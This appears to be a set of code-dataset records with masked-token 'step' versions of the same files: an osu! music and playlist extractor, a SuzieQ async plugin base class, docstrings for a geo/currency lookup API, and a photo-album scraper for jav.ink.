5 ] }
[ 1, 2, 3, 4, 5 ]
import os import shutil import configparser beatmap_dir = os.path.abspath(os.environ['LOCALAPPDATA']+'\\osu!\\Songs\\') beatmaps = [] bm_osu = [] with os.scandir(os.path.abspath(beatmap_dir)) as it: for entry in it: if entry.is_dir(): try: beatmap_id = int(str(entry.name).split(' ')[0]) except ValueError: # I'm not sure what to do about unranked maps right now, we will exclude them continue beatmaps.append(entry.path) beatmap_type = { "id": 0, # You may parse for "[Metadata]\n\nBeatmapSetID:{sid}" (WARN: Earlier maps will lack this parameter (osu file format v3 < osu file format v14)) or use the one provided with path "name": 'Author - Title', # I should get it from osu files rather than directory, but that's how it happens "audio": ".\\somefile.mp3", # Parse for "[General]\n\nAudioFilename: {filename}" | DONE "video": ".\\something.mp4" # Parse for "[Events]\n\nVideo,{timestamp},{filename}" (found mp4,avi,mpg) | plz check, TODO } for beatmap in beatmaps: with os.scandir(os.path.abspath(beatmap)) as it: bm = { 'id': int(str(os.path.split(beatmap)[1]).split(' ')[0]), 'name': str(os.path.split(beatmap)[1])[len(str(os.path.split(beatmap)[1]).split(' ')[0])+1:], 'audio': None, 'audio_length': None, 'video': None } print('{} {}'.format(bm['id'], bm['name'])) for entry in it: if entry.is_file(): if entry.path.endswith('osu'): # ConfigParser is actually overkill solution, although I set it up to work # FixMe: This solution does not account for multiple (via diff) maps in one # Although, ranked maps should never have this. with open(entry.path, 'r', encoding="utf-8") as f: config_string = '[global]\n' + f.read() a = '' for x in config_string.split('\n')[:config_string.split('\n').index('[Events]')-1]: a += x+'\n' config = configparser.ConfigParser(allow_no_value=True) config.read_string(a) # TODO: Rewrite to simple checks and add video checking. bm['audio'] = os.path.abspath(os.path.dirname(entry.path)+'\\'+config.get('General', 'AudioFilename')) elif entry.path.endswith('mp4') or entry.path.endswith('avi') or entry.path.endswith('mpg'): bm['video'] = entry.path bm_osu.append(bm) text_playlist = "" for bm in bm_osu: if bm['audio']: text_playlist += "#EXTINF:0,{0}\n{1}\n".format(bm['name'], bm['audio']) text_playlist = text_playlist[:-1] try: with open('osu.m3u', 'w', encoding='utf-8') as file: file.write(text_playlist) except: open('osu.m3u', 'x') with open('osu.m3u', 'w', encoding='utf-8') as file: file.write(text_playlist) text_type = "" for bm in bm_osu: if bm['name']: text_type += "{0}\n".format(bm['name']) text_type = text_type[:-1] try: with open('osu.txt', 'w', encoding='utf-8') as file: file.write(text_type) except: open('osu.txt', 'x') with open('osu.txt', 'w', encoding='utf-8') as file: file.write(text_type) for bm in bm_osu: if bm['audio']: print('{} {}'.format(bm['id'], bm['name'])) if os.path.basename(bm['audio']).split('.')[-1] != '': shutil.copy2(bm['audio'], "{}\\osu music\\{}.{}".format(os.getcwd(), bm['name'], os.path.basename(bm['audio']).split('.')[-1])) if bm['video']: shutil.copy2(bm['video'], "{}\\osu music\\{}.{}".format(os.getcwd(), bm['name'], os.path.basename(bm['video']).split('.')[-1])) print('done, ty for use')
normal
{ "blob_id": "cd34f9ef100ae6d116f02258d22c114ec3f3e3e6", "index": 1581, "step-1": "<mask token>\n", "step-2": "<mask token>\nwith os.scandir(os.path.abspath(beatmap_dir)) as it:\n for entry in it:\n if entry.is_dir():\n try:\n beatmap_id = int(str(entry.name).split(' ')[0])\n except ValueError:\n continue\n beatmaps.append(entry.path)\n<mask token>\nfor beatmap in beatmaps:\n with os.scandir(os.path.abspath(beatmap)) as it:\n bm = {'id': int(str(os.path.split(beatmap)[1]).split(' ')[0]),\n 'name': str(os.path.split(beatmap)[1])[len(str(os.path.split(\n beatmap)[1]).split(' ')[0]) + 1:], 'audio': None,\n 'audio_length': None, 'video': None}\n print('{} {}'.format(bm['id'], bm['name']))\n for entry in it:\n if entry.is_file():\n if entry.path.endswith('osu'):\n with open(entry.path, 'r', encoding='utf-8') as f:\n config_string = '[global]\\n' + f.read()\n a = ''\n for x in config_string.split('\\n')[:config_string.split\n ('\\n').index('[Events]') - 1]:\n a += x + '\\n'\n config = configparser.ConfigParser(allow_no_value=True)\n config.read_string(a)\n bm['audio'] = os.path.abspath(os.path.dirname(entry.\n path) + '\\\\' + config.get('General', 'AudioFilename'))\n elif entry.path.endswith('mp4') or entry.path.endswith('avi'\n ) or entry.path.endswith('mpg'):\n bm['video'] = entry.path\n bm_osu.append(bm)\n<mask token>\nfor bm in bm_osu:\n if bm['audio']:\n text_playlist += '#EXTINF:0,{0}\\n{1}\\n'.format(bm['name'], bm['audio'])\n<mask token>\ntry:\n with open('osu.m3u', 'w', encoding='utf-8') as file:\n file.write(text_playlist)\nexcept:\n open('osu.m3u', 'x')\n with open('osu.m3u', 'w', encoding='utf-8') as file:\n file.write(text_playlist)\n<mask token>\nfor bm in bm_osu:\n if bm['name']:\n text_type += '{0}\\n'.format(bm['name'])\n<mask token>\ntry:\n with open('osu.txt', 'w', encoding='utf-8') as file:\n file.write(text_type)\nexcept:\n open('osu.txt', 'x')\n with open('osu.txt', 'w', encoding='utf-8') as file:\n file.write(text_type)\nfor bm in bm_osu:\n if bm['audio']:\n print('{} {}'.format(bm['id'], bm['name']))\n if os.path.basename(bm['audio']).split('.')[-1] != '':\n shutil.copy2(bm['audio'], '{}\\\\osu music\\\\{}.{}'.format(os.\n getcwd(), bm['name'], os.path.basename(bm['audio']).split(\n '.')[-1]))\n if bm['video']:\n shutil.copy2(bm['video'], '{}\\\\osu music\\\\{}.{}'.format(os.getcwd(),\n bm['name'], os.path.basename(bm['video']).split('.')[-1]))\nprint('done, ty for use')\n", "step-3": "<mask token>\nbeatmap_dir = os.path.abspath(os.environ['LOCALAPPDATA'] + '\\\\osu!\\\\Songs\\\\')\nbeatmaps = []\nbm_osu = []\nwith os.scandir(os.path.abspath(beatmap_dir)) as it:\n for entry in it:\n if entry.is_dir():\n try:\n beatmap_id = int(str(entry.name).split(' ')[0])\n except ValueError:\n continue\n beatmaps.append(entry.path)\nbeatmap_type = {'id': 0, 'name': 'Author - Title', 'audio':\n '.\\\\somefile.mp3', 'video': '.\\\\something.mp4'}\nfor beatmap in beatmaps:\n with os.scandir(os.path.abspath(beatmap)) as it:\n bm = {'id': int(str(os.path.split(beatmap)[1]).split(' ')[0]),\n 'name': str(os.path.split(beatmap)[1])[len(str(os.path.split(\n beatmap)[1]).split(' ')[0]) + 1:], 'audio': None,\n 'audio_length': None, 'video': None}\n print('{} {}'.format(bm['id'], bm['name']))\n for entry in it:\n if entry.is_file():\n if entry.path.endswith('osu'):\n with open(entry.path, 'r', encoding='utf-8') as f:\n config_string = '[global]\\n' + f.read()\n a = ''\n for x in config_string.split('\\n')[:config_string.split\n ('\\n').index('[Events]') - 1]:\n a += x + '\\n'\n config = 
configparser.ConfigParser(allow_no_value=True)\n config.read_string(a)\n bm['audio'] = os.path.abspath(os.path.dirname(entry.\n path) + '\\\\' + config.get('General', 'AudioFilename'))\n elif entry.path.endswith('mp4') or entry.path.endswith('avi'\n ) or entry.path.endswith('mpg'):\n bm['video'] = entry.path\n bm_osu.append(bm)\ntext_playlist = ''\nfor bm in bm_osu:\n if bm['audio']:\n text_playlist += '#EXTINF:0,{0}\\n{1}\\n'.format(bm['name'], bm['audio'])\ntext_playlist = text_playlist[:-1]\ntry:\n with open('osu.m3u', 'w', encoding='utf-8') as file:\n file.write(text_playlist)\nexcept:\n open('osu.m3u', 'x')\n with open('osu.m3u', 'w', encoding='utf-8') as file:\n file.write(text_playlist)\ntext_type = ''\nfor bm in bm_osu:\n if bm['name']:\n text_type += '{0}\\n'.format(bm['name'])\ntext_type = text_type[:-1]\ntry:\n with open('osu.txt', 'w', encoding='utf-8') as file:\n file.write(text_type)\nexcept:\n open('osu.txt', 'x')\n with open('osu.txt', 'w', encoding='utf-8') as file:\n file.write(text_type)\nfor bm in bm_osu:\n if bm['audio']:\n print('{} {}'.format(bm['id'], bm['name']))\n if os.path.basename(bm['audio']).split('.')[-1] != '':\n shutil.copy2(bm['audio'], '{}\\\\osu music\\\\{}.{}'.format(os.\n getcwd(), bm['name'], os.path.basename(bm['audio']).split(\n '.')[-1]))\n if bm['video']:\n shutil.copy2(bm['video'], '{}\\\\osu music\\\\{}.{}'.format(os.getcwd(),\n bm['name'], os.path.basename(bm['video']).split('.')[-1]))\nprint('done, ty for use')\n", "step-4": "import os\nimport shutil\nimport configparser\nbeatmap_dir = os.path.abspath(os.environ['LOCALAPPDATA'] + '\\\\osu!\\\\Songs\\\\')\nbeatmaps = []\nbm_osu = []\nwith os.scandir(os.path.abspath(beatmap_dir)) as it:\n for entry in it:\n if entry.is_dir():\n try:\n beatmap_id = int(str(entry.name).split(' ')[0])\n except ValueError:\n continue\n beatmaps.append(entry.path)\nbeatmap_type = {'id': 0, 'name': 'Author - Title', 'audio':\n '.\\\\somefile.mp3', 'video': '.\\\\something.mp4'}\nfor beatmap in beatmaps:\n with os.scandir(os.path.abspath(beatmap)) as it:\n bm = {'id': int(str(os.path.split(beatmap)[1]).split(' ')[0]),\n 'name': str(os.path.split(beatmap)[1])[len(str(os.path.split(\n beatmap)[1]).split(' ')[0]) + 1:], 'audio': None,\n 'audio_length': None, 'video': None}\n print('{} {}'.format(bm['id'], bm['name']))\n for entry in it:\n if entry.is_file():\n if entry.path.endswith('osu'):\n with open(entry.path, 'r', encoding='utf-8') as f:\n config_string = '[global]\\n' + f.read()\n a = ''\n for x in config_string.split('\\n')[:config_string.split\n ('\\n').index('[Events]') - 1]:\n a += x + '\\n'\n config = configparser.ConfigParser(allow_no_value=True)\n config.read_string(a)\n bm['audio'] = os.path.abspath(os.path.dirname(entry.\n path) + '\\\\' + config.get('General', 'AudioFilename'))\n elif entry.path.endswith('mp4') or entry.path.endswith('avi'\n ) or entry.path.endswith('mpg'):\n bm['video'] = entry.path\n bm_osu.append(bm)\ntext_playlist = ''\nfor bm in bm_osu:\n if bm['audio']:\n text_playlist += '#EXTINF:0,{0}\\n{1}\\n'.format(bm['name'], bm['audio'])\ntext_playlist = text_playlist[:-1]\ntry:\n with open('osu.m3u', 'w', encoding='utf-8') as file:\n file.write(text_playlist)\nexcept:\n open('osu.m3u', 'x')\n with open('osu.m3u', 'w', encoding='utf-8') as file:\n file.write(text_playlist)\ntext_type = ''\nfor bm in bm_osu:\n if bm['name']:\n text_type += '{0}\\n'.format(bm['name'])\ntext_type = text_type[:-1]\ntry:\n with open('osu.txt', 'w', encoding='utf-8') as file:\n file.write(text_type)\nexcept:\n 
open('osu.txt', 'x')\n with open('osu.txt', 'w', encoding='utf-8') as file:\n file.write(text_type)\nfor bm in bm_osu:\n if bm['audio']:\n print('{} {}'.format(bm['id'], bm['name']))\n if os.path.basename(bm['audio']).split('.')[-1] != '':\n shutil.copy2(bm['audio'], '{}\\\\osu music\\\\{}.{}'.format(os.\n getcwd(), bm['name'], os.path.basename(bm['audio']).split(\n '.')[-1]))\n if bm['video']:\n shutil.copy2(bm['video'], '{}\\\\osu music\\\\{}.{}'.format(os.getcwd(),\n bm['name'], os.path.basename(bm['video']).split('.')[-1]))\nprint('done, ty for use')\n", "step-5": "import os\nimport shutil\nimport configparser\n\nbeatmap_dir = os.path.abspath(os.environ['LOCALAPPDATA']+'\\\\osu!\\\\Songs\\\\')\nbeatmaps = []\nbm_osu = []\n\nwith os.scandir(os.path.abspath(beatmap_dir)) as it:\n for entry in it:\n if entry.is_dir():\n try:\n beatmap_id = int(str(entry.name).split(' ')[0])\n except ValueError:\n # I'm not sure what to do about unranked maps right now, we will exclude them\n continue\n beatmaps.append(entry.path)\n\nbeatmap_type = {\n \"id\": 0, # You may parse for \"[Metadata]\\n\\nBeatmapSetID:{sid}\" (WARN: Earlier maps will lack this parameter (osu file format v3 < osu file format v14)) or use the one provided with path\n \"name\": 'Author - Title', # I should get it from osu files rather than directory, but that's how it happens\n \"audio\": \".\\\\somefile.mp3\", # Parse for \"[General]\\n\\nAudioFilename: {filename}\" | DONE\n \"video\": \".\\\\something.mp4\" # Parse for \"[Events]\\n\\nVideo,{timestamp},{filename}\" (found mp4,avi,mpg) | plz check, TODO\n}\n\nfor beatmap in beatmaps:\n with os.scandir(os.path.abspath(beatmap)) as it:\n bm = {\n 'id': int(str(os.path.split(beatmap)[1]).split(' ')[0]),\n 'name': str(os.path.split(beatmap)[1])[len(str(os.path.split(beatmap)[1]).split(' ')[0])+1:],\n 'audio': None,\n 'audio_length': None,\n 'video': None\n }\n print('{} {}'.format(bm['id'], bm['name']))\n for entry in it:\n if entry.is_file():\n if entry.path.endswith('osu'):\n # ConfigParser is actually overkill solution, although I set it up to work\n # FixMe: This solution does not account for multiple (via diff) maps in one\n # Although, ranked maps should never have this.\n with open(entry.path, 'r', encoding=\"utf-8\") as f:\n config_string = '[global]\\n' + f.read()\n a = ''\n for x in config_string.split('\\n')[:config_string.split('\\n').index('[Events]')-1]:\n a += x+'\\n'\n config = configparser.ConfigParser(allow_no_value=True)\n config.read_string(a)\n # TODO: Rewrite to simple checks and add video checking.\n bm['audio'] = os.path.abspath(os.path.dirname(entry.path)+'\\\\'+config.get('General', 'AudioFilename'))\n elif entry.path.endswith('mp4') or entry.path.endswith('avi') or entry.path.endswith('mpg'):\n bm['video'] = entry.path\n bm_osu.append(bm)\n\n\ntext_playlist = \"\"\nfor bm in bm_osu:\n if bm['audio']:\n text_playlist += \"#EXTINF:0,{0}\\n{1}\\n\".format(bm['name'], bm['audio'])\n\ntext_playlist = text_playlist[:-1]\n\ntry:\n with open('osu.m3u', 'w', encoding='utf-8') as file:\n file.write(text_playlist)\nexcept:\n open('osu.m3u', 'x')\n with open('osu.m3u', 'w', encoding='utf-8') as file:\n file.write(text_playlist)\n\ntext_type = \"\"\nfor bm in bm_osu:\n if bm['name']:\n text_type += \"{0}\\n\".format(bm['name'])\ntext_type = text_type[:-1]\ntry:\n with open('osu.txt', 'w', encoding='utf-8') as file:\n file.write(text_type)\nexcept:\n open('osu.txt', 'x')\n with open('osu.txt', 'w', encoding='utf-8') as file:\n file.write(text_type)\n\nfor bm in bm_osu:\n 
if bm['audio']:\n print('{} {}'.format(bm['id'], bm['name']))\n if os.path.basename(bm['audio']).split('.')[-1] != '':\n shutil.copy2(bm['audio'], \"{}\\\\osu music\\\\{}.{}\".format(os.getcwd(), bm['name'], os.path.basename(bm['audio']).split('.')[-1]))\n if bm['video']:\n shutil.copy2(bm['video'], \"{}\\\\osu music\\\\{}.{}\".format(os.getcwd(), bm['name'], os.path.basename(bm['video']).split('.')[-1]))\n\n\n\nprint('done, ty for use')", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from abc import abstractmethod

from suzieq.shared.sq_plugin import SqPlugin


class InventoryAsyncPlugin(SqPlugin):
    """Plugins which inherit this class expose a 'run' method.

    Once the controller checks that an object inherits this class, it launches
    a new task executing the run method.
    """

    async def run(self):
        """Background task to launch in order to execute the plugin"""
        try:
            await self._execute()
        finally:
            await self._stop()

    @abstractmethod
    async def _execute(self):
        """Launch the background task
        """

    async def _stop(self):
        """Actions to execute before terminating the task
        """
        return
normal
{ "blob_id": "8b49aa63cc6e4490b7b22cd304dbba132962c870", "index": 9049, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass InventoryAsyncPlugin(SqPlugin):\n <mask token>\n\n async def run(self):\n \"\"\"Background task to launch in order to execute the plugin\"\"\"\n try:\n await self._execute()\n finally:\n await self._stop()\n\n @abstractmethod\n async def _execute(self):\n \"\"\"Launch the backuground task\n \"\"\"\n\n async def _stop(self):\n \"\"\"Actions to execute before terminating the task\n \"\"\"\n return\n", "step-3": "<mask token>\n\n\nclass InventoryAsyncPlugin(SqPlugin):\n \"\"\"Plugins which inherit this class will have methods 'run'\n\n Once the controller check that the object inherit this class, it launches\n a new task executing the run method.\n \"\"\"\n\n async def run(self):\n \"\"\"Background task to launch in order to execute the plugin\"\"\"\n try:\n await self._execute()\n finally:\n await self._stop()\n\n @abstractmethod\n async def _execute(self):\n \"\"\"Launch the backuground task\n \"\"\"\n\n async def _stop(self):\n \"\"\"Actions to execute before terminating the task\n \"\"\"\n return\n", "step-4": "from abc import abstractmethod\nfrom suzieq.shared.sq_plugin import SqPlugin\n\n\nclass InventoryAsyncPlugin(SqPlugin):\n \"\"\"Plugins which inherit this class will have methods 'run'\n\n Once the controller check that the object inherit this class, it launches\n a new task executing the run method.\n \"\"\"\n\n async def run(self):\n \"\"\"Background task to launch in order to execute the plugin\"\"\"\n try:\n await self._execute()\n finally:\n await self._stop()\n\n @abstractmethod\n async def _execute(self):\n \"\"\"Launch the backuground task\n \"\"\"\n\n async def _stop(self):\n \"\"\"Actions to execute before terminating the task\n \"\"\"\n return\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
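A minimal subclass sketch showing the contract above; the polling loop and interval are illustrative only:

import asyncio

class ExamplePoller(InventoryAsyncPlugin):  # hypothetical plugin
    async def _execute(self):
        while True:
            # pull devices from some inventory source here
            await asyncio.sleep(60)

    async def _stop(self):
        # close connections / flush state before the task is cancelled
        return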
""" This is a post login API and hence would have APIDetails and SessionDetails in the request object ------------------------------------------------------------------------------------------------- Step 1: find if user's ip address is provided in the request object, if yes then got to step 2 else goto step 4 Step 2: call third party api to find the country of the IP address and its ISO2 and ISO3 codes Step 3: using the ISO2 and/or ISO3 codes get the user's geo and associated currency. Return output Step 4: from UserProfiles table get city_id and using this get the user's geo and associated currency. Return output """ """ INPUT: { "APIDetails":{ "token_type":1, "token_vendor_id":1, "token_string":"sdxfcgvbhjnmklasdfghjk", "dev_key":"sjdkljagagerukjdgjncjdsnjkfhkjasdghreuiuie@#$%$dgd#$@d234" }, "SessionDetails":{ "profile_id":159, "session_id":787, "session_key":"xxbJt0nUwyMbsDdOfVFYISRjoD1DC0jO" }, "APIParams":{ "user_ip" : "192.168.0.1" } } """ """ OUTPUT: { "AuthenticationDetails": { "Status": "Success", "Message": "ApiDetails fine to process" }, "SessionDetails": { "Status": "Success", "Message": "session is active. session details updated", "Payload": { "profile_id": 159, "session_id": 787, "session_key": "LcTyf2Ypx6YRQOz3AYOyaE2uedblWnZB" } }, "Payload": { "Status": "Success", "Message": "ticket types and respective questions Fetched successfully", "Payload": { "geo_id": 2, "geo_name": "Indian Subcontinent", "geo_currency": "INR" } } } """
normal
{ "blob_id": "d7daf9b26f0b9f66b15b8533df032d17719e548b", "index": 3343, "step-1": "<mask token>\n", "step-2": "\"\"\"\nThis is a post login API and hence would have APIDetails and SessionDetails in the request object\n-------------------------------------------------------------------------------------------------\nStep 1: find if user's ip address is provided in the request object, if yes then got to step 2 else goto step 4\nStep 2: call third party api to find the country of the IP address and its ISO2 and ISO3 codes\nStep 3: using the ISO2 and/or ISO3 codes get the user's geo and associated currency. Return output\nStep 4: from UserProfiles table get city_id and using this get the user's geo and associated currency. Return output\n\"\"\"\n\n\"\"\"\nINPUT:\n{\n \"APIDetails\":{\n \t\"token_type\":1,\n \t\"token_vendor_id\":1,\n \t\"token_string\":\"sdxfcgvbhjnmklasdfghjk\",\n \t\"dev_key\":\"sjdkljagagerukjdgjncjdsnjkfhkjasdghreuiuie@#$%$dgd#$@d234\"\n },\n \"SessionDetails\":{\n \"profile_id\":159,\n \"session_id\":787,\n \"session_key\":\"xxbJt0nUwyMbsDdOfVFYISRjoD1DC0jO\"\n },\n \"APIParams\":{\n \"user_ip\" : \"192.168.0.1\"\n }\n}\n\"\"\"\n\n\"\"\"\nOUTPUT:\n{\n \"AuthenticationDetails\": {\n \"Status\": \"Success\",\n \"Message\": \"ApiDetails fine to process\"\n },\n \"SessionDetails\": {\n \"Status\": \"Success\",\n \"Message\": \"session is active. session details updated\",\n \"Payload\": {\n \"profile_id\": 159,\n \"session_id\": 787,\n \"session_key\": \"LcTyf2Ypx6YRQOz3AYOyaE2uedblWnZB\"\n }\n },\n \"Payload\": {\n \"Status\": \"Success\",\n \"Message\": \"ticket types and respective questions Fetched successfully\",\n \"Payload\": {\n \"geo_id\": 2,\n \"geo_name\": \"Indian Subcontinent\",\n \"geo_currency\": \"INR\"\n }\n }\n}\n\"\"\"", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
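A sketch of the lookup order described in the steps above; every helper below is a hypothetical stub standing in for the third-party GeoIP call and the database reads, with return values taken from the sample OUTPUT payload:

def lookup_country_by_ip(ip):       # stub for the third-party GeoIP API (Step 2)
    return ('IN', 'IND')

def geo_by_country(iso2, iso3):     # stub for the country -> geo/currency mapping (Step 3)
    return {'geo_id': 2, 'geo_name': 'Indian Subcontinent', 'geo_currency': 'INR'}

def city_id_for(profile_id):        # stub for the UserProfiles city_id read (Step 4)
    return 42

def geo_by_city(city_id):           # stub for the city -> geo/currency mapping (Step 4)
    return geo_by_country('IN', 'IND')

def resolve_geo(api_params, profile_id):
    ip = api_params.get('user_ip')
    if ip:                                       # Step 1: was an IP provided?
        iso2, iso3 = lookup_country_by_ip(ip)    # Step 2
        return geo_by_country(iso2, iso3)        # Step 3
    return geo_by_city(city_id_for(profile_id))  # Step 4: fall back to the profile's city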
import sys from photo_dl.request import request from photo_dl.request import MultiRequest class Jav_ink: def __init__(self): self.parser_name = 'jav_ink' self.domain = 'https://www.jav.ink' self.album_flag = {} @staticmethod def category2albums(category_url): category_url = category_url[:category_url.find('/page/')] category_html = request(category_url) albums = category_html.xpath('//*[@id="infinite-articles"]/li[contains(@class, "post")]/a/@href') pages = category_html.xpath('//*[@class="pages"]/text()') if pages: pages = pages[0] pages = pages[pages.find('of') + 3:] urls = [] for page in range(1, int(pages) + 1): urls.append('%s/page/%d/' % (category_url, page)) urls = [{'url': url} for url in urls] threads = MultiRequest(urls=urls, progress=False).run() for thread in threads: albums.extend(thread.response.xpath('//*[@id="infinite-articles"]\ /li[contains(@class, "post")]/a/@href')) del thread return albums def album2photos(self, album_url, album_html): photos = [] album_id = album_html.xpath('//article/div/@id') if not album_id: return {'error': {'url': album_url, 'info': 'not supported'}} album_id = album_id[0] if album_id in self.album_flag: return self.album_flag[album_id] = 1 album_name = album_html.xpath('//*[contains(@class, "article-title")]/text()') photos_html = album_html.xpath('//*[@class="gallery-item"]') for photo_html in photos_html: photo_url = photo_html.xpath('.//a/@href')[0] photo_name = photo_url[photo_url.rfind('/') + 1:] photos.append({'photo_url': photo_url, 'photo_name': photo_name}) if len(album_name) == 0: album_name = album_url.split('/')[-2] else: album_name = album_name[0] album = {'parser_name': self.parser_name, 'album_name': album_name, 'photos': photos} return album def url2albums(self, url): albums_url = [] if '/category/' in url or '/?s=' in url: albums_url.extend(self.category2albums(url)) else: albums_url.append(url) albums = [] urls = [{'url': url} for url in albums_url] threads = MultiRequest(urls=urls, name=url).run() for thread in threads: try: album = self.album2photos(thread.url, thread.response) if album is not None: albums.append(album) except SystemExit: sys.exit() except: albums.append({'error': {'url': thread.url, 'info': 'parse error'}}) del thread return albums
normal
{ "blob_id": "9fff345dedcfc7051a258bc471acf07aece95bcf", "index": 9319, "step-1": "<mask token>\n\n\nclass Jav_ink:\n\n def __init__(self):\n self.parser_name = 'jav_ink'\n self.domain = 'https://www.jav.ink'\n self.album_flag = {}\n <mask token>\n\n def album2photos(self, album_url, album_html):\n photos = []\n album_id = album_html.xpath('//article/div/@id')\n if not album_id:\n return {'error': {'url': album_url, 'info': 'not supported'}}\n album_id = album_id[0]\n if album_id in self.album_flag:\n return\n self.album_flag[album_id] = 1\n album_name = album_html.xpath(\n '//*[contains(@class, \"article-title\")]/text()')\n photos_html = album_html.xpath('//*[@class=\"gallery-item\"]')\n for photo_html in photos_html:\n photo_url = photo_html.xpath('.//a/@href')[0]\n photo_name = photo_url[photo_url.rfind('/') + 1:]\n photos.append({'photo_url': photo_url, 'photo_name': photo_name})\n if len(album_name) == 0:\n album_name = album_url.split('/')[-2]\n else:\n album_name = album_name[0]\n album = {'parser_name': self.parser_name, 'album_name': album_name,\n 'photos': photos}\n return album\n <mask token>\n", "step-2": "<mask token>\n\n\nclass Jav_ink:\n\n def __init__(self):\n self.parser_name = 'jav_ink'\n self.domain = 'https://www.jav.ink'\n self.album_flag = {}\n <mask token>\n\n def album2photos(self, album_url, album_html):\n photos = []\n album_id = album_html.xpath('//article/div/@id')\n if not album_id:\n return {'error': {'url': album_url, 'info': 'not supported'}}\n album_id = album_id[0]\n if album_id in self.album_flag:\n return\n self.album_flag[album_id] = 1\n album_name = album_html.xpath(\n '//*[contains(@class, \"article-title\")]/text()')\n photos_html = album_html.xpath('//*[@class=\"gallery-item\"]')\n for photo_html in photos_html:\n photo_url = photo_html.xpath('.//a/@href')[0]\n photo_name = photo_url[photo_url.rfind('/') + 1:]\n photos.append({'photo_url': photo_url, 'photo_name': photo_name})\n if len(album_name) == 0:\n album_name = album_url.split('/')[-2]\n else:\n album_name = album_name[0]\n album = {'parser_name': self.parser_name, 'album_name': album_name,\n 'photos': photos}\n return album\n\n def url2albums(self, url):\n albums_url = []\n if '/category/' in url or '/?s=' in url:\n albums_url.extend(self.category2albums(url))\n else:\n albums_url.append(url)\n albums = []\n urls = [{'url': url} for url in albums_url]\n threads = MultiRequest(urls=urls, name=url).run()\n for thread in threads:\n try:\n album = self.album2photos(thread.url, thread.response)\n if album is not None:\n albums.append(album)\n except SystemExit:\n sys.exit()\n except:\n albums.append({'error': {'url': thread.url, 'info':\n 'parse error'}})\n del thread\n return albums\n", "step-3": "<mask token>\n\n\nclass Jav_ink:\n\n def __init__(self):\n self.parser_name = 'jav_ink'\n self.domain = 'https://www.jav.ink'\n self.album_flag = {}\n\n @staticmethod\n def category2albums(category_url):\n category_url = category_url[:category_url.find('/page/')]\n category_html = request(category_url)\n albums = category_html.xpath(\n '//*[@id=\"infinite-articles\"]/li[contains(@class, \"post\")]/a/@href'\n )\n pages = category_html.xpath('//*[@class=\"pages\"]/text()')\n if pages:\n pages = pages[0]\n pages = pages[pages.find('of') + 3:]\n urls = []\n for page in range(1, int(pages) + 1):\n urls.append('%s/page/%d/' % (category_url, page))\n urls = [{'url': url} for url in urls]\n threads = MultiRequest(urls=urls, progress=False).run()\n for thread in threads:\n 
albums.extend(thread.response.xpath(\n '//*[@id=\"infinite-articles\"] /li[contains(@class, \"post\")]/a/@href'\n ))\n del thread\n return albums\n\n def album2photos(self, album_url, album_html):\n photos = []\n album_id = album_html.xpath('//article/div/@id')\n if not album_id:\n return {'error': {'url': album_url, 'info': 'not supported'}}\n album_id = album_id[0]\n if album_id in self.album_flag:\n return\n self.album_flag[album_id] = 1\n album_name = album_html.xpath(\n '//*[contains(@class, \"article-title\")]/text()')\n photos_html = album_html.xpath('//*[@class=\"gallery-item\"]')\n for photo_html in photos_html:\n photo_url = photo_html.xpath('.//a/@href')[0]\n photo_name = photo_url[photo_url.rfind('/') + 1:]\n photos.append({'photo_url': photo_url, 'photo_name': photo_name})\n if len(album_name) == 0:\n album_name = album_url.split('/')[-2]\n else:\n album_name = album_name[0]\n album = {'parser_name': self.parser_name, 'album_name': album_name,\n 'photos': photos}\n return album\n\n def url2albums(self, url):\n albums_url = []\n if '/category/' in url or '/?s=' in url:\n albums_url.extend(self.category2albums(url))\n else:\n albums_url.append(url)\n albums = []\n urls = [{'url': url} for url in albums_url]\n threads = MultiRequest(urls=urls, name=url).run()\n for thread in threads:\n try:\n album = self.album2photos(thread.url, thread.response)\n if album is not None:\n albums.append(album)\n except SystemExit:\n sys.exit()\n except:\n albums.append({'error': {'url': thread.url, 'info':\n 'parse error'}})\n del thread\n return albums\n", "step-4": "import sys\nfrom photo_dl.request import request\nfrom photo_dl.request import MultiRequest\n\n\nclass Jav_ink:\n\n def __init__(self):\n self.parser_name = 'jav_ink'\n self.domain = 'https://www.jav.ink'\n self.album_flag = {}\n\n @staticmethod\n def category2albums(category_url):\n category_url = category_url[:category_url.find('/page/')]\n category_html = request(category_url)\n albums = category_html.xpath(\n '//*[@id=\"infinite-articles\"]/li[contains(@class, \"post\")]/a/@href'\n )\n pages = category_html.xpath('//*[@class=\"pages\"]/text()')\n if pages:\n pages = pages[0]\n pages = pages[pages.find('of') + 3:]\n urls = []\n for page in range(1, int(pages) + 1):\n urls.append('%s/page/%d/' % (category_url, page))\n urls = [{'url': url} for url in urls]\n threads = MultiRequest(urls=urls, progress=False).run()\n for thread in threads:\n albums.extend(thread.response.xpath(\n '//*[@id=\"infinite-articles\"] /li[contains(@class, \"post\")]/a/@href'\n ))\n del thread\n return albums\n\n def album2photos(self, album_url, album_html):\n photos = []\n album_id = album_html.xpath('//article/div/@id')\n if not album_id:\n return {'error': {'url': album_url, 'info': 'not supported'}}\n album_id = album_id[0]\n if album_id in self.album_flag:\n return\n self.album_flag[album_id] = 1\n album_name = album_html.xpath(\n '//*[contains(@class, \"article-title\")]/text()')\n photos_html = album_html.xpath('//*[@class=\"gallery-item\"]')\n for photo_html in photos_html:\n photo_url = photo_html.xpath('.//a/@href')[0]\n photo_name = photo_url[photo_url.rfind('/') + 1:]\n photos.append({'photo_url': photo_url, 'photo_name': photo_name})\n if len(album_name) == 0:\n album_name = album_url.split('/')[-2]\n else:\n album_name = album_name[0]\n album = {'parser_name': self.parser_name, 'album_name': album_name,\n 'photos': photos}\n return album\n\n def url2albums(self, url):\n albums_url = []\n if '/category/' in url or '/?s=' in url:\n 
